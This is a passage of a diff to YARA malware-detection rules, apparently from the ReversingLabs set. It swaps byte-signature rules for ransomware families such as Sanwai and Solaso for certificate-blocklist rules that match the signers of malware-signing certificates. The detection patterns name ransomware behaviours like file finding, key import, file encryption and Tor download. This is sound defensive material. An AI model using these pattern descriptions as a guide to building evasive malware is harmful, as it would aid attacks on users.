-            83 EC ?? 56 57 B9 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D 7C 24 ?? 33 C0 F3 A5 A4 89 44 24 ??
-            89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 66 89 44 24 ?? 50 50 50 6A ?? 50 88
-            44 24 ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 8D 4C 24 ?? 8B F0 6A ?? 51 56
-            FF 15 ?? ?? ?? ?? 8B F8 56 8B 35 ?? ?? ?? ?? 85 FF 75 ?? FF D6 6A ?? FF D6 E8
-        }
-		$start_service_3 = {
-            83 EC ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83
-            38 ?? 7D ?? E8 ?? ?? ?? ?? 83 C4 ?? C3 57 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ??
-            ?? 8B F8 85 FF 74 ?? 53 56 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B 1D
-            ?? ?? ?? ?? 8B F0 85 F6 74 ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 56 FF D3 57 FF D3 5E
-            5B 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
-            ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 5F 83 C4 ?? C3
-        }
-		$main_4 = {
-            83 EC ?? 57 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 85 FF 74 ?? 53 56 68
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B F0 85 F6 74 ??
-            6A ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 56 FF D3 57 FF D3 5E 5B 8D 44 24 ?? C7 44 24 ?? ??
-            ?? ?? ?? 50 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
-            FF 15 ?? ?? ?? ?? 33 C0 5F 83 C4 ?? C2
-        }
-		$main_5 = {
-            68 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50
-            FF D6 59 85 C0 59 74 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 FF D6 59 88 18 59 8D 85 ?? ?? ??
-            ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 59 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 53 53 53 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 5F 5E 85 C0 74 ?? 8D 45 ?? 8D
-            8D ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 89 5D ?? E8 ?? ?? ?? ?? 3B C3 74 ?? FF 75 ?? 50 E8
-            ?? ?? ?? ?? 59 3B C3 59 74 ?? 68 ?? ?? ?? ?? 50 E8
-        }
-		$main_6 = {
-            FF 74 24 ?? FF 74 24 ?? FF 74 24 ?? FF 74 24 ?? E8 ?? ?? ?? ?? C2
-        }
-		$set_reg_key_6 = {
-            68 ?? ?? ?? ?? F3 AB 66 AB AA 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 FF 15 ?? ?? ??
-            ?? 8B 2D ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 83 C4 ?? 33 FF 89 7C 24 ?? 85 FF 75 ?? 8D 4C
-            24 ?? 8D 54 24 ?? 51 52 68 ?? ?? ?? ?? EB ?? 8D 44 24 ?? 8D 4C 24 ?? 50 51 68 ?? ??
-            ?? ?? FF 15 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 85
-            C9 74 ?? 8D 94 24 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? FF D5 8D BC 24 ?? ?? ?? ?? 83 C9 ??
-            33 C0 F2 AE F7 D1 8D 84 24 ?? ?? ?? ?? 51 8B 4C 24 ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ??
-            51 FF D3 8B 7C 24 ?? 8B F0 F7 DE 1B F6 46 EB ?? 8D 54 24 ?? 8D 8C 24 ?? ?? ?? ?? 52
-            51 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 C7 44 24 ?? ?? ?? ?? ?? FF 15
-        }
-		$download_tor_6 = {
-            81 EC ?? ?? ?? ?? 53 55 56 57 E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? A0 ?? ?? ?? ??
-            B9 ?? ?? ?? ?? 88 44 24 ?? 33 C0 8D 7C 24 ?? 8B 35 ?? ?? ?? ?? F3 AB 68 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 66 AB 68 ?? ?? ?? ?? 8D 4C 24 ?? 33 ED 68 ?? ?? ?? ?? 51 89 2D ?? ??
-            ?? ?? 89 2D ?? ?? ?? ?? AA FF D6 8B 1D ?? ?? ?? ?? 83 C4 ?? 8D 54 24 ?? 52 FF D3 83
-            F8 ?? 0F 85 ?? ?? ?? ?? 55 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 84
-            C0 75 ?? 5F 5E 5D 5B 81 C4 ?? ?? ?? ?? C3 A0 ?? ?? ?? ?? B9 ?? ?? ?? ?? 88 84 24 ??
-            ?? ?? ?? 33 C0 8D BC 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? F3 AB 66 AB 68 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 AA FF D6 83 C4 ?? 8D 94 24 ?? ?? ??
-            ?? 52 FF D3 83 F8 ?? 75 ?? 5F 5E 5D 32 C0 5B 81 C4 ?? ?? ?? ?? C3
-        }
-		$main_7 = {
-            68 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50
-            FF D6 59 85 C0 59 74 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 FF D6 59 88 18 59 8D 85 ?? ?? ??
-            ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 59 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 53 53 53 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 5F 5E 85 C0 74 ?? 8D 45 ?? 8D
-            8D ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 53 8F 45 ?? E8 ?? ?? ?? ?? 39 44 24 ?? 74 ?? 89 44
-            24 ?? 83 EC ?? 2B C3 58 74 ?? FF 75 ?? 50 E8 ?? ?? ?? ?? 59 89 44 24 ?? 83 EC ?? 2B
-            C3 58 59 74 ?? 68 ?? ?? ?? ?? 50 E8
-        }
-		$main_8 = {
-            68 ?? ?? ?? ?? F3 AB 66 AB AA 8D 44 24 ?? 50 6A ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ??
-            ?? 8D 4C 24 ?? 6A ?? 51 FF D6 83 C4 ?? 85 C0 74 ?? 8D 54 24 ?? 6A ?? 52 FF D6 83 C4
-            ?? C6 00 ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 5F
-            5E 85 C0 74 ?? 8D 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 8D 8C 24 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 54 24 ?? 52 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74
-            ?? 68 ?? ?? ?? ?? 50 E8
-        }
-		$entrypoint_all = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ??
-            ?? 83 EC ?? 53 56 57 89 65 ?? 33 DB 89 5D ?? 6A ?? FF 15 ?? ?? ?? ?? 59 83 0D ?? ??
-            ?? ?? ?? 83 0D ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 08 FF 15 ?? ??
-            ?? ?? 8B 0D ?? ?? ?? ?? 89 08 A1 ?? ?? ?? ?? 8B 00 A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 39
-            1D ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 FF 35 ?? ?? ??
-            ?? 8D 45 ?? 50 8D 45 ?? 50 8D 45 ?? 50 FF 15
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $entrypoint_all at pe.entry_point ) and ( $main_1 or $main_2 or ( $main_3 and $start_service_3 ) or $main_4 or $main_5 or ( $main_6 and ( $set_reg_key_6 or $download_tor_6 ) ) or $main_7 or $main_8 )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE9\\x87\\x8D\\xE5\\xBA\\x86\\xE6\\x8E\\xA2\\xE9\\x95\\xBF\\xE7\\xBD\\x91\\xE7\\xBB\\x9C\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "62:94:b8:ac:c3:5d:ea:7d:32:a9:5a:c5:d4:53:6f:8f" and 1517443200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Sanwai : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_485E4626C32493C16283Cfd9E30D17Ad : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Sanwai ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "01912621-4a34-5e34-8542-5b561e8da567"
-		date = "2021-11-11"
-		modified = "2021-11-11"
+		id = "7e6834e5-ce32-5ba6-82cf-99d7b90fb4f0"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Sanwai.yara#L1-L71"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "a7a95b2403fe539dce0d856cc1c04d15440677ea39c0a22e818b42333a64e92c"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15096-L15112"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "faf860786e8473493d24abf6e61cf0b906e98d786516be6d2098181368214020"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Sanwai"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 53 56 57 A1 ?? ?? ?? ??
-            33 C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 55 ?? 8B D9 83 7B ?? ?? 8B F3 8B 45 ?? 8B 7D
-            ?? 89 45 ?? 72 ?? 8B 33 8D 4E ?? 66 8B 06 83 C6 ?? 66 85 C0 75 ?? 2B F1 D1 FE 0F 84
-            ?? ?? ?? ?? 3B 73 ?? 0F 85 ?? ?? ?? ?? 88 45 ?? 8D 55 ?? FF 75 ?? 8D 4D ?? C7 45 ??
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? C7 45 ?? ?? ?? ??
-            ?? 50 8B CB E8 ?? ?? ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B
-            C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 76 ?? FF 15 ??
-            ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 7B ?? ?? 72 ?? 8B 1B 8B 75 ?? 57 56 53 E8
-            ?? ?? ?? ?? 85 C0 75 ?? 8B 36 8B CF E8 ?? ?? ?? ?? 84 C0 74 ?? 57 56 E8 ?? ?? ?? ??
-            85 C0 75 ?? 8B CF E8 ?? ?? ?? ?? 84 C0 75 ?? 33 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59
-            5F 5E 5B 8B E5 5D C3 83 F8 ?? 75 ?? 8B 4D ?? D1 E9 F6 C1 ?? B9 ?? ?? ?? ?? 0F 45 C1
-            8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B E5 5D C3 B8 ?? ?? ?? ?? 8B 4D ?? 64 89
-            0D ?? ?? ?? ?? 59 5F 5E 5B 8B E5 5D C3
-        }
-		$import_key = {
-            8D 44 24 ?? 50 6A ?? 6A ?? 6A ?? 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 5E 85
-            C0 75 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 32 C0 5F 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ??
-            83 C4 ?? C3 8B 44 24 ?? FF 74 24 ?? 8B 08 8B 40 ?? 89 47 ?? 8D 44 24 ?? 50 57 6A ??
-            6A ?? 6A ?? FF 74 24 ?? 89 0F FF 15 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 6A ??
-            FF 74 24 ?? FF 15 ?? ?? ?? ?? 8B 4C 24 ?? B0 ?? 5F 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C3
-        }
-		$encrypt_files = {
-            8B 01 3B 02 75 ?? 83 C1 ?? 83 C2 ?? 83 EE ?? 73 ?? 8A 01 3A 02 75 ?? 83 FE ?? 74 ??
-            8A 41 ?? 3A 42 ?? 75 ?? 8A 41 ?? 3A 42 ?? 75 ?? 8A 41 ?? 3A 42 ?? 75 ?? 33 C0 EB ??
-            1B C0 83 C8 ?? 85 C0 75 ?? 8B 5D ?? 8B 7D ?? C6 85 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B
-            BD ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B CF E8 ?? ?? ?? ?? 51 C6 45 ?? ?? 8D 4D ?? 8B
-            9D ?? ?? ?? ?? 51 83 CB ?? 8B C8 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 CB ?? ?? ?? ??
-            C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 83 CB ?? 83 7D ?? ?? 89 9D ?? ?? ?? ?? 0F 43 4D ?? 83
-            7D ?? ?? 89 9D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 8B 01 3B
-            02 75 ?? 83 C1 ?? 83 C2 ?? 83 EE ?? 73 ?? 8A 01 3A 02 75 ?? 83 FE ?? 74 ?? 8A 41 ??
-            3A 42 ?? 75 ?? 8A 41 ?? 3A 42 ?? 75 ?? 8A 41 ?? 3A 42 ?? 75 ?? 33 C0 EB ?? 1B C0 83
-            C8 ?? 85 C0 75 ?? 8B 5D ?? 8B 7D ?? C6 85 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 45 ?? 8B
-            CF 50 E8 ?? ?? ?? ?? 51 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 51 83 CB ?? 8B C8 89 9D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B 7D ?? 8D 4D ?? 81 CB ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 8B 5D ??
-            83 FB ?? 0F 43 CF 83 7D ?? ?? 0F 85
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $import_key ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "48:5e:46:26:c3:24:93:c1:62:83:cf:d9:e3:0d:17:ad" and 1473292800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win64_Ransomware_Solaso : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_D0312F9177Cd46B943Df3Ef22Db4608B : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Solaso ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "53f56ad8-ccdf-58f0-a5d9-e58f2c18ac76"
-		date = "2021-11-02"
-		modified = "2021-11-02"
+		id = "b36ba3c9-4a64-505a-ae27-ec8ee969dc29"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win64.Ransomware.Solaso.yara#L1-L171"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "368a80a9f2e264d17c61d6ed4c22baec838ba0b0bc2e5c79344830bf861aa5a2"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15114-L15132"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2eb955e91c927980cee031c6284e48bad315e891c32cdaf41b844090e841c44d"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Solaso"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            C6 85 ?? ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 45 ?? 4C 89 AD ?? ?? ?? ?? 48 8D 85
-            ?? ?? ?? ?? 48 89 45 ?? B1 ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 90 4C 8D 05 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 90 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8D
-            85 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B BD
-            ?? ?? ?? ?? 4C 8B BD ?? ?? ?? ?? 49 3B FF 0F 84 ?? ?? ?? ?? 66 0F 1F 44 00 ?? 48 8D
-            95 ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 90 48 8D 95 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ??
-            ?? 48 0F 43 95 ?? ?? ?? ?? 4C 8B 85 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            48 8B C8 E8 ?? ?? ?? ?? 4C 89 AD ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85
-            ?? ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 48 0F 43 95 ?? ?? ?? ??
-            4C 8B 85 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B CF 48 83 7F ?? ?? 72
-            ?? 48 8B 0F BA ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ??
-            48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 44 24 ?? 4C 89 AD ??
-            ?? ?? ?? 4C 89 AD ?? ?? ?? ?? 48 8B B5 ?? ?? ?? ?? 4C 8D B5 ?? ?? ?? ?? 48 83 BD ??
-            ?? ?? ?? ?? 4C 0F 43 B5 ?? ?? ?? ?? 48 83 FE ?? 73 ?? 41 0F 10 06 0F 11 85 ?? ?? ??
-            ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48
-        }
-		$find_files_p2 = {
-            8B DE 48 83 CB ?? 48 3B D8 48 0F 47 D8 48 8D 4B ?? 48 81 F9 ?? ?? ?? ?? 72 ?? 48 8D
-            41 ?? 48 3B C1 0F 86 ?? ?? ?? ?? 0F AE E8 48 8B C8 E8 ?? ?? ?? ?? 48 8B C8 48 85 C0
-            0F 84 ?? ?? ?? ?? 48 83 C0 ?? 48 83 E0 ?? 48 89 48 ?? EB ?? 48 85 C9 74 ?? 0F AE E8
-            E8 ?? ?? ?? ?? EB ?? 49 8B C5 48 89 85 ?? ?? ?? ?? 4C 8D 46 ?? 49 8B D6 48 8B C8 E8
-            ?? ?? ?? ?? 48 89 9D ?? ?? ?? ?? 48 89 B5 ?? ?? ?? ?? 4C 89 6D ?? 4C 89 6D ?? 48 8B
-            B5 ?? ?? ?? ?? 4C 8D B5 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 4C 0F 43 B5 ?? ?? ?? ??
-            48 83 FE ?? 73 ?? 41 0F 10 06 0F 11 45 ?? 48 C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 48
-            B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 45 ?? 48 8B DE 48 83 CB ?? 48 89 5D ?? 48 3B D8 48
-            0F 47 D8 48 8D 4B ?? 48 81 F9 ?? ?? ?? ?? 72 ?? 48 8D 41 ?? 48 3B C1 0F 86 ?? ?? ??
-            ?? 0F AE E8 48 8B C8 E8 ?? ?? ?? ?? 48 8B C8 48 85 C0 0F 84 ?? ?? ?? ?? 48 83 C0 ??
-            48 83 E0 ?? 48 89 48 ?? EB ?? 48 85 C9 74 ?? 0F AE E8 E8 ?? ?? ?? ?? EB ?? 49 8B C5
-            48 89 45 ?? 4C 8D 46 ?? 49 8B D6 48 8B C8 E8 ?? ?? ?? ?? 48 89 5D ?? 48 89 75 ?? 4C
-            8D 85 ?? ?? ?? ?? 48 8D 55 ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 8D
-        }
-		$encrypt_files_p1 = {
-            48 63 53 ?? 48 89 B5 ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? 45 33
-            C0 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 8D 55 ?? 48 83 BD ?? ?? ?? ?? ?? 48 0F 43 55 ??
-            4C 63 43 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 89 4B ?? 48 85 C9 0F 84
-            ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 3B CA 77 ?? 48 89 8D ?? ?? ?? ?? 48 8D 45 ?? 48
-            83 BD ?? ?? ?? ?? ?? 48 0F 43 45 ?? C6 04 01 ?? EB ?? 48 8B F1 48 2B F2 4C 8B 85 ??
-            ?? ?? ?? 49 8B C0 48 2B C2 48 3B F0 77 ?? 48 89 8D ?? ?? ?? ?? 48 8D 7D ?? 49 83 F8
-            ?? 48 0F 43 7D ?? 48 03 FA 4C 8B C6 33 D2 48 8B CF E8 ?? ?? ?? ?? C6 04 37 ?? EB ??
-            0F AE E8 C6 44 24 ?? ?? 4C 8B CE 48 8B D6 48 8D 4D ?? E8 ?? ?? ?? ?? 33 F6 8B 43 ??
-            99 41 F7 FD B9 ?? ?? ?? ?? 85 C0 0F 45 C8 89 4B ?? 83 F9 ?? 0F 8C ?? ?? ?? ?? 4C 63
-            C9 4C 8D 45 ?? 48 8D 54 24 ?? E8 ?? ?? ?? ?? 48 8B F8 48 3B D8 74 ?? 48 8B 0B 48 85
-        }
-		$encrypt_files_p2 = {
-            C9 74 ?? 48 8B 53 ?? E8 ?? ?? ?? ?? 48 8B 0B 48 8B 53 ?? 48 2B D1 48 83 E2 ?? 48 81
-            FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 4C 8B 41 ?? 49 2B C8 48 8D 41 ?? 48 83 F8 ?? 0F 87
-            ?? ?? ?? ?? 49 8B C8 E8 ?? ?? ?? ?? 48 89 33 48 89 73 ?? 48 89 73 ?? 48 8B 07 48 89
-            03 48 8B 47 ?? 48 89 43 ?? 48 8B 47 ?? 48 89 43 ?? 48 89 37 48 89 77 ?? 48 89 77 ??
-            48 8B 4C 24 ?? 48 85 C9 74 ?? 48 8B 54 24 ?? E8 ?? ?? ?? ?? 48 8B 54 24 ?? 48 8B 4C
-            24 ?? 48 2B D1 48 83 E2 ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49
-            ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 74 24 ??
-            0F 57 C0 F3 0F 7F 44 24 ?? EB ?? 48 8B 0B 48 8D 45 ?? 48 3B C8 74 ?? 48 8D 55 ?? 48
-            83 BD ?? ?? ?? ?? ?? 48 0F 43 55 ?? 4C 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B CB E8
-            ?? ?? ?? ?? 45 33 C0 48 8D 15 ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 83 7B ?? ?? 74
-            ?? 33 FF 0F 1F 40 ?? 66 0F 1F 84 00 ?? ?? 00 00 4C 8B 03 4C 03 C7 49 8B D0 49 83 78
-            ?? ?? 72 ?? 49 8B 10 4D 8B 40 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 48 63 CE 48 C1 E1 ?? 48
-        }
-		$encrypt_files_p3 = {
-            03 0B 45 33 C0 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 0B 48 03 CF 48 C7 41 ?? ??
-            ?? ?? ?? 48 83 79 ?? ?? 72 ?? 48 8B 09 C6 01 ?? FF C6 48 83 C7 ?? 3B 73 ?? 75 ?? 48
-            8D 55 ?? 48 83 BD ?? ?? ?? ?? ?? 48 0F 43 55 ?? 4C 8B 85 ?? ?? ?? ?? 48 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 90 48 8B 95 ?? ?? ?? ?? 48 83 FA ?? 72 ?? 48 FF C2 48 8B 4D ??
-            48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48
-            83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 63 48 ?? 33 F6 F6 44 0C
-            ?? ?? 75 ?? E9 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 83 FA ?? 72 ?? 48 FF C2 48 8B 4D
-            ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ??
-            48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 3D ?? ?? ?? ?? 48 8D 4C 24 ?? E8
-            ?? ?? ?? ?? BB ?? ?? ?? ?? 48 85 C0 75 ?? 48 8B 44 24 ?? 48 63 48 ?? 48 8D 44 24 ??
-            48 03 C8 41 8B D4 48 83 79 ?? ?? 0F 45 D3 0B 51 ?? 45 33 C0 E8 ?? ?? ?? ?? 48 8D 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 C0 75 ?? 48 8B 85 ?? ?? ?? ?? 48 63 48 ?? 48 8D 85
-            ?? ?? ?? ?? 48 03 C8 48 83 79 ?? ?? 44 0F 45 E3 44 0B 61 ?? 45 33 C0 41 8B D4 E8 ??
-            ?? ?? ?? 90 48 8B 85 ?? ?? ?? ?? 48 63 48 ?? 48 89 BC 0D ?? ?? ?? ?? 48 8B 85 ?? ??
-            ?? ?? 48 63 48 ?? 8D 91 ?? ?? ?? ?? 89 94 0D ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ??
